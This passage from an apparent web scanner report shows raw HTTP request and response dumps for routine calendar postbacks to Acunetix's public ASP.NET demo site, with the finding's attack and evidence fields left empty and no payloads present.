href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8225&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgAAhvc9YdoIZGRkNub5RNTaIgYO0eibGMz7eKtQB3w%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK6k%2FyFBgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2B%2BZVE21LWuG3jehUmlJJdH20BkDw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:15:06 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgAAhvc9YdoIZGRkNub5RNTaIgYO0eibGMz7eKtQB3w=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK6k/yFBgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q++ZVE21LWuG3jehUmlJJdH20BkDw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:White" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1123 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,123 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8135&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgCAWA6FGtoIZGRkZy6%2BnophN7sF9jC4C4kgtlrpiZQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK6lv%2BoBQKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDHC%2FkY8KGrJ4ay%2B7J4yvXJkL1F57
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:18:36 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgCAWA6FGtoIZGRkZy6+nophN7sF9jC4C4kgtlrpiZQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK6lv+oBQKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDHC/kY8KGrJ4ay+7J4yvXJkL1F57" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:White" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 